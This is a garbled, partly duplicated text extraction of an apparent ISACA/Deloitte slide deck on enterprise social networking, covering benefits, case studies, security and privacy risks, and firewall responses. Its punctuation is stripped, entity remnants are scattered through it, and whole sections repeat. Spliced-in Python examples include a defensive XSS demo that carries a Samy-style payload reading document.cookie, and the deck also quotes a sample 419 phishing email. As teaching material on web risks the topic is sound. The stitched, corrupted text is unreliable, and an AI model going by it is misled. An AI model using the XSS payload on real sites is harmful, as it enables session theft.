bull Reduce the net volume of e-mail and allow users to ldquopullrdquo information at their convenience as opposed to spending time reading through mass e-mail chain
bull Create better quality deliverables faster by drawing on the collective talents knowledge and experiences of other employees around the world
Operational efficienciesbull A leading energy company realized approximately $250K in annual cost savings by
conducting its employee conference virtually using Social Media
Improved reportingbull A global investment bank tightened reporting cycle times from several
weeks to ldquoabout 30 secondsrdquo per stakeholder by enabling them to submit their information directly into a team wiki and making that information instantly available to others in a rich dashboard mashup
wwwisacaorg23
Increase employee productivity and Increase employee productivity and operational efficiencies (cont)operational efficiencies (cont)
bull American Red Crossndash Designed to incite discussions around issues the American Red Cross cares
about and describe actions individuals can take (online or offline) to help people prevent prepare for and respond to emergencies and give valuable information about preventing preparing for and responding to emergencieshttpredcrosschatorg
wwwisacaorg24
Increase employee productivity and Increase employee productivity and operational efficiencies (cont)operational efficiencies (cont)
bull Deloittersquos DWikindash Provides a safe flexible knowledge creation and information sharing
environment for all Deloitte practitioners across country practice and Deloitte organizational borders
ndash Enhances the client service delivery capabilities of our Deloitte practitioners ndash Serves as a test environment for innovative concepts and solutions which
expand the business interests of Deloitte
As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
wwwisacaorg25
Foster creativity innovation and Foster creativity innovation and collaborationcollaboration
bull Harness product process and service innovations by unlocking creativityand ideas from any area of the company
bull The diverse group feedback inherent in social computing accelerates the problem-solving process and produces better solutions
bull Employees create unexpected connections with one another and expand their base of knowledge experience and circle of trusted colleagues
Product innovationbull A leading high-tech manufacturer instituted a ldquosubmit-and-vote-for-your-favorite-ideardquo
social community with its consumers generating over 5000 ideas and over 300000 votes in its first three months and subsequently identifying new product offerings
Information capturebull A federal agency created an internal wiki to bolster the capture and
dissemination of mission-critical information between field agents
wwwisacaorg26
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Best Buyndash A community of Best Buy employees who convene regularly to share
knowledge best practices frustrations aspirations and a few jokes Community members include everyone from recent high school graduates to semi retireeshttpsmixblueshirtnationcom
wwwisacaorg27
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Deloittersquos DStreetndash Enterprise talent networking site - changing the way we connect with each
otherndash Enables another way of collaboration and community buildingndash Network build new relationships and forge successful careersndash Learn about colleagues and interesting ways to introduce yourselfndash Identify new connection points to create a basis for meaningful conversationndash A new way of assembling the right team
As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
wwwisacaorg28
Enhance customer and partner Enhance customer and partner relationshipsrelationships
bull Opens the lines of communication beyond typical spokespeople such as marketing sales and PR and provides an avenue for other important stakeholders (eg engineers scientists product managers) to gather firsthand feedback from customers
bull Allow customers to access help beyond traditional means with networks that provide peer support and a user-generated knowledgebase while monitoring customer perception
bull Provide a forum for collaborative business development education and communications with vendors OEMs and other partners
bull Allow consumers who know your products and services best to become a part of the new offering development process
Revenue growthbull A major consumer goods company improved sales by 315 by including
customer ratings user-generated product reviews and other social features on its online storefront also resulting in a 40 uptick in average order value
wwwisacaorg29
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Procter amp Gamblendash Capessa launched in the ldquoYahoo Healthrdquo section of Yahoocom one of the
worlds leading internet destinations Women who register with Capessayahoocom have access to several topic areas including parenting pregnancy weight loss relationships career healthy living and care givinghttprealwomenrealadvicecom
wwwisacaorg30
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull American Expressndash OPEN Forum an online resource and networking site for business owners
The site is designed to forge meaningful business connections and provide practical actionable information and insights from influential bloggers industry leaders and savvy entrepreneurshttpwwwopenforumcom
wwwisacaorg31
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull State of Louisville Kentuckyndash Interactive audit findings on Web site Allows the users to discuss previous
audit findingshttpwwwlouisvillekygovInternalAudit
wwwisacaorg32
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Amazonndash A social network for people who love books Users are able to create a
virtual shelf to show off their books see what their friends are reading and discover new books httpwwwshelfaricom
wwwisacaorg33
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Bank of America (BofA)ndash On January 29 2010 Bank of America Web site was down BofA used
twitter to keep in touch with its customers to let them know the latest update
wwwisacaorg34
Risks and challenges
Risks and challenges

• Farmers and Mobsters
  – Top Facebook applications
  • Source: http://statistics.allfacebook.com/applications/leaderboard (March 2010)
  • There are now more than 500,000 active applications on the Facebook Platform

  Rank  Name                     Monthly active users
     1  FarmVille                        82,580,911
     2  Static FBML                      46,827,021
     3  Birthday Cards                   41,904,049
     4  Café World                       30,032,716
     5  Facebook for iPhone              29,438,848
     6  Texas HoldEm Poker               28,332,917
     7  Slide FunSpace                   25,630,033
     8  Happy Aquarium (BETA)            24,915,971
     9  Mafia Wars                       24,704,179
    10  Causes                           24,317,292
Risks and challenges (cont.)

• New security concerns and attack vectors, resulting from the shift in technology: Web services are empowering server-side core technology components, while Asynchronous JavaScript and XML ("AJAX") and Rich Internet Application ("RIA") clients are enhancing client-end interfaces in the browser itself.
• Top 10 Web 2.0 attack vectors (http://net-square.com/whitepapers/Top10_Web20_AV.pdf):
  – Cross-site scripting ("XSS") in AJAX, e.g. the Samy worm that exploited an XSS flaw in MySpace.com
  – XML poisoning: poisoned XML blocks coming from the AJAX client
  – Malicious AJAX code execution: the browser replays the user's cookies with each request, so injected code acts as the user
  – RSS/Atom injection: JavaScript injected into feeds to attack the client browser
  – Web Services Description Language ("WSDL") scanning and enumeration
  – Client-side validation in AJAX routines: applications fail to perform server-side checks
  – Web services routing issues: compromise of intermediate nodes
  – Parameter manipulation with SOAP: web services consume information and variables from SOAP
  – XPath injection in SOAP messages: bypass of authentication mechanisms
  – RIA thick-client binary manipulation: issues with session management
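As an added example (not from the deck or the net-square paper), the following Python contrasts the blacklist-style filter that the Samy worm defeated with output encoding of untrusted profile text, the server-side check that the "client-side validation" and "XSS in AJAX" vectors above both come down to. The filter, the payload and the `browser_would_execute` heuristic are constructed for illustration; the payload only mirrors the publicly documented shape of the 2005 worm (the word javascript split by a newline inside a CSS url()), and nothing here touches a live site.

```python
"""Blacklist filtering vs. output encoding for user-supplied profile HTML.

Added example, not part of the ISACA deck or the net-square whitepaper.
The blacklist, the payload and the browser heuristic are all constructed
here for illustration; the payload follows the publicly documented shape
of the 2005 MySpace (Samy) worm and does not contact any site.
"""
import html
import re

# Hypothetical blacklist of the kind MySpace relied on: strip <script> tags and
# the literal token "javascript", then trust whatever survives as live HTML.
_SCRIPT_TAG = re.compile(r"<\s*/?\s*script[^>]*>", re.IGNORECASE)
_JS_TOKEN = re.compile(r"javascript", re.IGNORECASE)

# Constructed test inputs.
SCRIPT_TAG_PAYLOAD = "<script>alert(1)</script>"
SAMY_STYLE_PAYLOAD = (
    # 'java' + newline + 'script' defeats a substring match; the browser of
    # the day stripped the whitespace and executed the javascript: URL in CSS.
    "<div style=\"background:url('java\nscript:alert(document.cookie)')\">"
    "hello</div>"
)


def blacklist_filter(user_html: str) -> str:
    """Vulnerable: remove known-bad tokens, pass the rest through as markup."""
    return _JS_TOKEN.sub("", _SCRIPT_TAG.sub("", user_html))


def render_untrusted(user_text: str) -> str:
    """Hardened: the profile text is data, so entity-encode it for the HTML
    body context before it reaches the page. This runs on the server, so an
    attacker who bypasses validation in the AJAX front end gains nothing."""
    return '<div class="about">' + html.escape(user_text, quote=True) + "</div>"


def browser_would_execute(markup: str) -> bool:
    """Coarse stand-in for a 2005-era browser: collapse whitespace inside the
    'javascript' keyword, then look for a javascript: URL inside a tag's style
    attribute. Only here to make the example testable; not a real HTML parser."""
    normalised = re.sub(r"java\s*script", "javascript", markup, flags=re.IGNORECASE)
    return re.search(r"<[^>]*\bstyle\s*=[^>]*javascript:", normalised,
                     re.IGNORECASE) is not None


if __name__ == "__main__":
    for payload in (SCRIPT_TAG_PAYLOAD, SAMY_STYLE_PAYLOAD):
        filtered = blacklist_filter(payload)
        print("blacklist ->", repr(filtered), "executes:", browser_would_execute(filtered))
        encoded = render_untrusted(payload)
        print("encoded   ->", repr(encoded), "executes:", browser_would_execute(encoded))
```

The blacklist catches the obvious `<script>` case and misses the split keyword, which is exactly the failure mode of enumerating bad input; encoding for the output context needs no knowledge of the payload and removes the whole class.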
Risks and challenges (cont.)

• Example worms and phishing attacks affecting social networking sites
  – Koobface: targets Facebook, MySpace, hi5, Bebo, Twitter and other sites. Users are prompted to click on a URL purporting to be an update from Adobe, and a worm is downloaded to the PC which looks for personal data.
  – Fbaction: Facebook phishing attack that encourages users to sign up for fbaction.net using their Facebook credentials. Those credentials are then used to hijack the Facebook account.
  – Boface: convinces users to click on a link pointing to a video, resulting in a download. Shortly after the download is complete the user's Facebook account is hijacked and used as a means of spamming (and propagating the worm to) all their friends.
• Common element: they all take advantage of the implied trust that social networking users have with each other.
Risks and challenges (cont.)

"Has what we've learned about writing software the last 20 years been expressed in the design of Web 2.0? Of course not. It can't even be said to have a design. If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming, Web 2.0 would not be happening." - Marcus Ranum, InfoSec Magazine, May 2008

• Trust: data reliability commonly causes issues for social media in the workplace. The Web has partially solved this with techniques such as inbound link counting, and reputation and voting systems are starting to appear, often as plug-ins for social media tools.
• Attackers may also take advantage of URL shortening (bit.ly, tr.im, tinyurl.com, etc.), which hides the real destination of a link until it is followed.
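The check a user or a mail/web gateway wants against shortened links is to expand them without visiting the destination in a browser. The Python below is an added example, not part of the deck: it follows redirects one hop at a time with HEAD requests, caps the number of hops, detects loops, and reports simple warning signs. The shortener host list, the hop limit and the redirect table used for the offline demo are assumptions made for this example.

```python
"""Expand a shortened URL without visiting the destination in a browser.

Added example, not part of the deck. Follows HTTP redirects one hop at a
time with HEAD requests and reports the whole chain plus warning signs, so
the real destination of a bit.ly-style link is visible before anyone clicks.
The shortener hostnames, the hop limit and the sample redirect table are
assumptions made for this example.
"""
import ipaddress
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, List, Optional

# Hypothetical list of shorteners; the deck names bit.ly, tr.im and tinyurl.com.
SHORTENER_HOSTS = {"bit.ly", "tr.im", "tinyurl.com"}


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Make urllib surface 3xx responses instead of silently following them."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def head_location(url: str, timeout: float = 5.0) -> Optional[str]:
    """Issue one HEAD request; return the Location header of a 3xx, else None."""
    opener = urllib.request.build_opener(_NoRedirect)
    req = urllib.request.Request(url, method="HEAD")
    try:
        with opener.open(req, timeout=timeout) as resp:
            return None if resp.status < 300 else resp.headers.get("Location")
    except urllib.error.HTTPError as err:
        if 300 <= err.code < 400:
            return err.headers.get("Location")
        raise


def expand_short_url(url: str, head: Callable[[str], Optional[str]] = head_location,
                     max_hops: int = 5) -> List[str]:
    """Return the redirect chain starting at `url`, following at most `max_hops`.

    `head` is injectable so the function can be exercised offline.
    """
    chain = [url]
    for _ in range(max_hops):
        location = head(chain[-1])
        if location is None:
            return chain
        nxt = urllib.parse.urljoin(chain[-1], location)  # Location may be relative
        if nxt in chain:
            raise ValueError("redirect loop: " + " -> ".join(chain + [nxt]))
        chain.append(nxt)
    raise ValueError("exceeded %d redirects: %s" % (max_hops, " -> ".join(chain)))


def warning_signs(chain: List[str]) -> List[str]:
    """Heuristics worth showing the user alongside the final destination."""
    signs = []
    hosts = [urllib.parse.urlsplit(u).hostname or "" for u in chain]
    if sum(h in SHORTENER_HOSTS for h in hosts) > 1:
        signs.append("chained shorteners")
    try:
        ipaddress.ip_address(hosts[-1])
        signs.append("destination is a bare IP address")
    except ValueError:
        pass
    if (urllib.parse.urlsplit(chain[0]).scheme == "https"
            and urllib.parse.urlsplit(chain[-1]).scheme == "http"):
        signs.append("downgrade from https to http")
    return signs


# Constructed redirect table standing in for the network during the demo.
_FAKE_REDIRECTS = {
    "https://bit.ly/3xAmpl": "http://tinyurl.com/y2example",
    "http://tinyurl.com/y2example": "http://203.0.113.7/login/facebook",
    "https://bit.ly/loop1": "https://bit.ly/loop2",
    "https://bit.ly/loop2": "https://bit.ly/loop1",
}


def fake_head(url: str) -> Optional[str]:
    """Offline stand-in for head_location driven by the constructed table."""
    return _FAKE_REDIRECTS.get(url)


if __name__ == "__main__":
    chain = expand_short_url("https://bit.ly/3xAmpl", head=fake_head)
    print(" -> ".join(chain))
    print("warnings:", warning_signs(chain))
```

A gateway would pass `head_location` so the lookups hit the network; the demo wires in the constructed table so it runs offline. The hop cap and loop detection are not optional: chaining one shortener through another is itself a common way to defeat link scanners.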
Risks and challenges (cont.)

• More on phishing: social networks are a target-rich environment

  "Dearest One...
  Sorry for the nature of this email, please bear with me.
  I am Natasha Kone, a 22 year old lady now; I was born on the 1st of January 1986 to the family of Kone. My father's name is Kamara Cone. He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively. I am their only child. When I was a kid I attended a private school and things were well for me and my parents. Things changed when I was in High School; my mother died on the 21st October 1994. My father then took me very special and gave me motherly care. As fate had it my father died last year..." - See http://www.419legal.org for more details

• The 419 scams have evolved with the technology, now using LinkedIn to target specific individuals.
Risks and challenges (cont.)

• Reputation: damage to company brand or reputation through inappropriate comments or remarks from employees
  – Even a lack of response may damage the brand. For example, XYZ Company Inc. creates a Twitter account called XYZ_Cares and then fails to use the account.
  – Other examples include creating a social media program but not telling the rest of the company about it, so they are unaware of any promotions or offers being publicized.
• Copyright violation: third-party material such as essays, articles and photographs is used without written consent from the owner.
• Intellectual property theft: inadvertent data leakage is harder to prevent because of the one-to-many nature of Web 2.0 as a medium.
Risks and challenges (cont.)

• Failures in the use of social media: most companies that use social media don't approach it the way they would other mission-critical technology
  – At best, it can be said that most companies today are merely dabbling with social media...
  – Few have approached the solution with an integrated strategy or a concrete business case, usually because they either aren't fully convinced of its value or have been slowed by the security and legal issues.
  – Without a strategy and proper metrics based on a business case, their projects will remain small, mismanaged and likely to fail.

"Fully half of all Social Media investments will fail" - Gartner
Risks and challenges (cont.)

"When I discovered YouTube, I didn't work for five days. I did nothing. I viewed 'Cookie Monster sings Chocolate Rain' about 1,000 times." - Michael Scott, The Office

• Productivity: users employ social media tools for nonproductive purposes such as socializing ("social notworking"). http://news.bbc.co.uk/2/hi/business/8325865.stm
Risks and challenges (cont.)

• Technical integration: most organizations note that integration between individual Web 2.0 applications and their overall infrastructure is a major concern
  – "Sign in using your account with": Facebook, Twitter, Myspace, Yahoo, Google, Windows Live ID, AOL, Blogger, WordPress, Netlog, OpenID, flickr
  – Each federated identity provider accepted becomes part of the organization's trust boundary: a hijacked social account (compare Fbaction above) then also opens every site that accepts that login.
Risks and challenges (cont.)

• Information hoarding: in many industries value is placed on what an employee knows that others do not know. This belief prevents data sharing.
• Quantification: researchers currently face challenges quantifying social networking benefits
  – Valuation techniques include, among others, Beckstrom's law, which states that "The value of a network equals the net value of each user's transactions conducted through that network, valued from the perspective of each user and summed for all."
  – http://en.wikipedia.org/wiki/Beckstrom's_law
Risks and challenges (cont.)

• Litigation issues: discrimination, defamation, violation of privacy and harassment are some of the potential concerns that might result in litigation.
A quick word on privacy

"People have really gotten comfortable not only sharing more information and different kinds, but more openly and with more people. That social norm is just something that has evolved over time."
- Mark Zuckerberg, Facebook founder

"If you have something that you don't want anyone to know, maybe you shouldn't be doing it in the first place."
- Eric Schmidt, CEO, Google Inc.
A quick word on privacy (cont.)

• Loss of Fourth Amendment protection
• Encryption of data storage unlikely
• Lack of encryption while data is in use
• Data remanence: limited attempt to address
Responding to the risks and challenges

• Policies and procedures
  – Acceptable use policy
    • Details how social networking sites and applications can be used
    • Defines consequences for failure to comply, e.g. "termination of employment and legal action"
• Risk assessment
  – Establish what information is most critical to the business
  – Understand how information might become vulnerable and how to protect it (data mapping)
Responding to the risks and challenges (cont.)

• Education and awareness
  – Inform users of the information security risks involved and how to guard against them
    • For example, only install or run applications from trusted sources approved by the corporate IT department
Responding to the risks and challenges (cont.)

• Vulnerability assessments
  – Identifying, quantifying and prioritizing the potential vulnerabilities that social networking may present to the organization
• Firewalls
  – Historically, firewalls focused on ports, IP addresses and packets
  – But social networking applications operate on ports 80 and 443, alongside all other web traffic, so a port-based rule cannot single them out
  – Next-generation firewall technology offers granular control of social networking functionality:
    • Identify applications regardless of port, protocol, evasive tactic or SSL
    • Identify users regardless of IP address
    • Scan application content in real time
    • Visibility and policy control over application access
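To make the "identify applications regardless of port or SSL" bullet concrete, here is an added Python example (not from the deck or any vendor's product). It reads the Host header from plaintext HTTP requests and the Server Name Indication from TLS ClientHello messages, maps the name to an application, and applies a block/allow decision in which the destination port plays no part. The application catalogue, the blocked set, and the sample flows (including the ClientHello builder used to construct them) are assumptions made for this example.

```python
"""Identify social networking traffic by application, not by port.

Added example, not from the deck or any vendor's product. It does what the
"next-generation firewall" bullets describe in miniature: read the HTTP Host
header from plaintext requests and the Server Name Indication (SNI) from TLS
ClientHello messages, map the name to an application, and apply policy
regardless of the destination port. The application catalogue, the blocked
set and the sample flows are constructed for this example.
"""
import struct
from typing import List, Optional, Tuple

# Hypothetical catalogue; a real appliance ships thousands of signatures.
APP_CATALOGUE = {
    "facebook.com": "facebook", "fbcdn.net": "facebook",
    "twitter.com": "twitter", "myspace.com": "myspace", "linkedin.com": "linkedin",
}
BLOCKED_APPS = {"facebook", "myspace"}  # hypothetical policy


def extract_http_host(payload: bytes) -> Optional[str]:
    """Return the Host header of a plaintext HTTP/1.x request, without port."""
    lines = payload.split(b"\r\n\r\n", 1)[0].split(b"\r\n")
    request_line = lines[0].split(b" ")
    if len(request_line) != 3 or not request_line[2].startswith(b"HTTP/"):
        return None
    for line in lines[1:]:
        name, sep, value = line.partition(b":")
        if sep and name.strip().lower() == b"host":
            host = value.strip().decode("latin-1")
            return host.rsplit(":", 1)[0] if host.count(":") == 1 else host
    return None


def extract_sni(payload: bytes) -> Optional[str]:
    """Walk a TLS ClientHello (record and handshake headers, fixed fields, the
    variable-length session id / cipher suites / compression lists, then the
    extensions) and return the server_name, or None if there is none."""
    try:
        if payload[0] != 0x16 or payload[5] != 0x01:   # handshake record, ClientHello
            return None
        pos = 5 + 4 + 2 + 32                            # headers, version, random
        pos += 1 + payload[pos]                         # session_id
        pos += 2 + struct.unpack_from("!H", payload, pos)[0]   # cipher_suites
        pos += 1 + payload[pos]                         # compression_methods
        end = pos + 2 + struct.unpack_from("!H", payload, pos)[0]
        pos += 2
        while pos + 4 <= end:
            ext_type, ext_len = struct.unpack_from("!HH", payload, pos)
            pos += 4
            if ext_type == 0x0000:                      # server_name extension
                # list length (2), name_type (1) = host_name, name length (2), name
                name_len = struct.unpack_from("!H", payload, pos + 3)[0]
                return payload[pos + 5:pos + 5 + name_len].decode("ascii")
            pos += ext_len
    except (IndexError, struct.error, UnicodeDecodeError):
        return None
    return None


def classify(server_name: str) -> Optional[str]:
    """Match the name or any parent domain against the catalogue."""
    labels = server_name.lower().rstrip(".").split(".")
    for i in range(len(labels) - 1):
        app = APP_CATALOGUE.get(".".join(labels[i:]))
        if app:
            return app
    return None


def identify_application(payload: bytes) -> Optional[str]:
    """Application label for the first client payload of a flow, or None."""
    name = extract_http_host(payload) or extract_sni(payload)
    return classify(name) if name else None


def enforce(flows: List[Tuple[int, bytes]]) -> List[Tuple[int, Optional[str], str]]:
    """Decide per flow from the identified application; the port is only reported."""
    decisions = []
    for dst_port, payload in flows:
        app = identify_application(payload)
        decisions.append((dst_port, app, "block" if app in BLOCKED_APPS else "allow"))
    return decisions


def build_client_hello(server_name: str) -> bytes:
    """Construct a minimal TLS 1.2 ClientHello with an SNI extension (sample input)."""
    name = server_name.encode("ascii")
    sni_list = struct.pack("!HBH", len(name) + 3, 0, len(name)) + name
    ext = struct.pack("!HH", 0x0000, len(sni_list)) + sni_list
    body = (b"\x03\x03" + bytes(32) + b"\x00"                   # version, random, no session id
            + struct.pack("!H", 2) + b"\xc0\x2f"                # one cipher suite
            + b"\x01\x00"                                       # null compression
            + struct.pack("!H", len(ext)) + ext)
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body
    return b"\x16\x03\x01" + struct.pack("!H", len(handshake)) + handshake


def sample_flows() -> List[Tuple[int, bytes]]:
    """Constructed flows: (destination port, first client payload)."""
    return [
        (80, b"GET /home.php HTTP/1.1\r\nHost: www.facebook.com\r\n\r\n"),
        (8443, build_client_hello("www.facebook.com")),      # TLS on an odd port
        (443, build_client_hello("mail.example.com")),        # unrelated TLS
        (8080, b"GET /1/statuses/update.json HTTP/1.1\r\nhost: api.twitter.com:8080\r\n\r\n"),
    ]


if __name__ == "__main__":
    for dst_port, app, action in enforce(sample_flows()):
        print(f"port {dst_port:>5}  app={app!s:<10} {action}")
```

SNI is sent in the clear in TLS 1.2 and, absent Encrypted Client Hello, in TLS 1.3, so this is what an SSL-aware firewall can see without decrypting. A name-based match is still evadable through shared CDN hostnames or domain fronting, which is why the vendor bullets also call for scanning application content, not just the handshake.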
What is next in the world of social networking
Where we are at today

• Enterprise social media has crossed the tipping point and is no longer considered an "emerging" technology
  – "The Hype Cycle": http://en.wikipedia.org/wiki/Hype_cycle
What's next in the world of social networking

• Increase in the use of mobile devices to access social networks
  – Over 600 million people will use their phone to access social networks by 2013, more than four times the 2009 figure of 140 million (source: eMarketer)
• Increase in frequency of access
  – Facebook mobile users are 50% more active than other users of the site
• Take your social profile with you as you travel the Web
  – For example, Facebook Connect
• Social networks will become more pervasive, broadcasting your location in geo-networking apps
  – Interaction between devices. For example, your car's navigation system will be able to learn your friend's location and provide directions to them
Some further predictions

• Some quotes on social networks
  – "Probably the greatest transformative force in our generation, absent a major war" - Mark Zuckerberg, Facebook founder
  – "(Twitter is)... something important that has the potential to change the world, though we have a long way to go" - Biz Stone, co-founder of Twitter
Q&A
Today's Presenters

Nelson Gibbs
Senior Manager, AERS – Audit & Enterprise Risk Services
Deloitte & Touche LLP
ngibbs@deloitte.com
+1 213 593 4241
Appendix

• Additional resources
  – Gopal, Raj et al., "Web 2.0 reinvents corporate networking", Deloitte Consulting LLP (2008)
  – The Economist, A special report on social networking (January 30, 2010)
  – Fraser, Matthew; Dutta, Soumitra (2008). Throwing Sheep in the Boardroom: How Online Social Networking Will Transform Your Life, Work and World
  – "Great Wall of Facebook: The Social Network's Plan to Dominate the Internet – and Keep Google Out" by Fred Vogelstein, Wired Magazine (June 2009), http://www.wired.com/techbiz/it/magazine/17-07/ff_facebookwall
  – "The Future is Social, Not Search, Facebook COO Says" by Ryan Singel, Wired Magazine (October 2009), http://www.wired.com/epicenter/2009/10/facebook-social-2
  – British Computer Society Social Media web site: http://www.bcs.org/socialmedia
This presentation contains general information only, and Deloitte is not, by means of this presentation, rendering accounting, business, financial, investment, legal, tax or other professional advice or services. This presentation is not a substitute for such professional advice or services, nor should it be used as a basis for any decision or action that may affect your business. Before making any decision or taking any action that may affect your business, you should consult a qualified professional advisor.

Deloitte, its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation.
Social Networking Companies

Social media                      Popular examples
Wikis                             Wikitravel, Wikipedia, wikiHow, WikiBooks, The TV IV
Blogs                             LiveJournal, WordPress, Blogger, Technorati, Xanga
Social networking                 myspace.com, LinkedIn, Facebook, Friendster, Plaxo
RSS (Really Simple Syndication)   NewsGator, Bloglines, iGoogle, FeedBurner
Presence and microblogging        Twitter, Pownce, Jaiku, Hictu, Tumblr
Social bookmarking and tagging    del.icio.us, Digg, reddit, Newsvine, StumbleUpon
Online photo and video sharing    YouTube, Flickr, Shutterfly, Last.fm, SlideShare
Why and how companies are using social networking
Statistics on companies using social networking

Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies: US = 29 companies, Europe = 48 companies, Asia-Pacific = 20 companies, Latin America = 3 companies.
Source: http://www.burson-marsteller.com/Innovation_and_insights/blogs_and_podcasts/BM_Blog/Documents/Burson-Marsteller%202010%20Global%20Social%20Media%20Check-up%20white%20paper.pdf
Companies typically adopt social media for three major benefits

1. Increase employee productivity and operational efficiencies
2. Foster creativity, innovation and collaboration
3. Enhance customer and partner relationships
Increase employee productivity and operational efficiencies

• Creates a lightweight institutional memory system for a company's intellectual assets to be easily captured, stored and accessed
• Reduces the net volume of e-mail and allows users to "pull" information at their convenience, as opposed to spending time reading through mass e-mail chains
• Creates better quality deliverables faster by drawing on the collective talents, knowledge and experiences of other employees around the world

Operational efficiencies
• A leading energy company realized approximately $250K in annual cost savings by conducting its employee conference virtually using social media

Improved reporting
• A global investment bank tightened reporting cycle times from several weeks to "about 30 seconds" per stakeholder by enabling them to submit their information directly into a team wiki and making that information instantly available to others in a rich dashboard mashup
Increase employee productivity and operational efficiencies (cont.)

• American Red Cross
  – Designed to incite discussion around issues the American Red Cross cares about, describe actions individuals can take (online or offline) to help people prevent, prepare for and respond to emergencies, and give valuable information about preventing, preparing for and responding to emergencies. http://redcrosschat.org
Increase employee productivity and operational efficiencies (cont.)

• Deloitte's DWiki
  – Provides a safe, flexible knowledge creation and information sharing environment for all Deloitte practitioners across country, practice and Deloitte organizational borders
  – Enhances the client service delivery capabilities of our Deloitte practitioners
  – Serves as a test environment for innovative concepts and solutions which expand the business interests of Deloitte

As used in this document, "Deloitte" means Deloitte LLP. Please see www.deloitte.com/us/about for a detailed description of the legal structure of Deloitte LLP and its subsidiaries.
Foster creativity, innovation and collaboration

• Harness product, process and service innovations by unlocking creativity and ideas from any area of the company
• The diverse group feedback inherent in social computing accelerates the problem-solving process and produces better solutions
• Employees create unexpected connections with one another and expand their base of knowledge, experience and circle of trusted colleagues

Product innovation
• A leading high-tech manufacturer instituted a "submit-and-vote-for-your-favorite-idea" social community with its consumers, generating over 5,000 ideas and over 300,000 votes in its first three months and subsequently identifying new product offerings

Information capture
• A federal agency created an internal wiki to bolster the capture and dissemination of mission-critical information between field agents
Foster creativity, innovation and collaboration (cont.)

• Best Buy
  – A community of Best Buy employees who convene regularly to share knowledge, best practices, frustrations, aspirations and a few jokes. Community members include everyone from recent high school graduates to semi-retirees. https://mix.blueshirtnation.com
Foster creativity, innovation and collaboration (cont.)

• Deloitte's DStreet
  – Enterprise talent networking site, changing the way we connect with each other
  – Enables another way of collaboration and community building
  – Network, build new relationships and forge successful careers
  – Learn about colleagues and interesting ways to introduce yourself
  – Identify new connection points to create a basis for meaningful conversation
  – A new way of assembling the right team
Enhance customer and partner relationships

• Opens the lines of communication beyond typical spokespeople such as marketing, sales and PR, and provides an avenue for other important stakeholders (e.g. engineers, scientists, product managers) to gather firsthand feedback from customers
• Allows customers to access help beyond traditional means, with networks that provide peer support and a user-generated knowledgebase, while monitoring customer perception
• Provides a forum for collaborative business development, education and communications with vendors, OEMs and other partners
• Allows consumers who know your products and services best to become a part of the new offering development process
Revenue growthbull A major consumer goods company improved sales by 315 by including
customer ratings user-generated product reviews and other social features on its online storefront also resulting in a 40 uptick in average order value
wwwisacaorg29
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Procter amp Gamblendash Capessa launched in the ldquoYahoo Healthrdquo section of Yahoocom one of the
worlds leading internet destinations Women who register with Capessayahoocom have access to several topic areas including parenting pregnancy weight loss relationships career healthy living and care givinghttprealwomenrealadvicecom
wwwisacaorg30
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull American Expressndash OPEN Forum an online resource and networking site for business owners
The site is designed to forge meaningful business connections and provide practical actionable information and insights from influential bloggers industry leaders and savvy entrepreneurshttpwwwopenforumcom
wwwisacaorg31
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull State of Louisville Kentuckyndash Interactive audit findings on Web site Allows the users to discuss previous
audit findingshttpwwwlouisvillekygovInternalAudit
wwwisacaorg32
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Amazonndash A social network for people who love books Users are able to create a
virtual shelf to show off their books see what their friends are reading and discover new books httpwwwshelfaricom
wwwisacaorg33
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Bank of America (BofA)ndash On January 29 2010 Bank of America Web site was down BofA used
twitter to keep in touch with its customers to let them know the latest update
wwwisacaorg34
Risks and challengesRisks and challenges
wwwisacaorg35
Risks and challengesRisks and challengesbull Farmers and Mobsters
ndash Top Facebook Applications
bull Source - httpstatisticsallfacebookcomapplicationsleaderboard (March 2010)bull There are now more than 500000 active applications on the Facebook Platform
Rank Name Monthly Active Users
1 FarmVille 82580911
2 Static FBML 46827021
3 Birthday Cards 41904049
4 Cafeacute World 30032716
5 Facebook for iPhone 29438848
6 Texas HoldEm Poker 28332917
7 Slide FunSpace 25630033
8 Happy Aquariam (BETA) 24915971
9 Mafia Wars 24704179
10 Causes 24317292
wwwisacaorg36
bull New security concerns and attack vectors mdash as a result of the shift in technology through Web services that are empowering server-side core technology components as well as Asynchronous JavaScript and XML (ldquoAJAXrdquo) and Rich Internet Application (ldquoRIArdquo) clients that are enhancing client-end interfaces in the browser itself
bull Top 10 Web 20 Attack Vectors mdash httpnet-squarecomwhitepapersTop10_Web20_AVpdfndash Cross-site scripting (ldquoCSSrdquo) in AJAX eg ldquoSamy worm that exploited MySpacecomrsquos CSS flawrdquondash XML poisoning mdash poison XML blocks coming from AJAX clientndash Malicious AJAX code execution mdash replay of cookies for each requestndash RSSAtom injection mdash inject JavaScripts into the RSS feeds to generate attack on client browserndash Web Services Definition Language (ldquoWSDLrdquo) scanning and enumerationndash Client-side validation in AJAX routines mdash fail to perform server-side checksndash Web services routing issues mdash compromise of intermediate nodesndash Parameter manipulation with SOAP mdash web services consume information and variables from SOAPndash XPATH injection in SOAP message mdash bypass authentication mechanismsndash RIA thick client binary manipulation mdash issues with session management
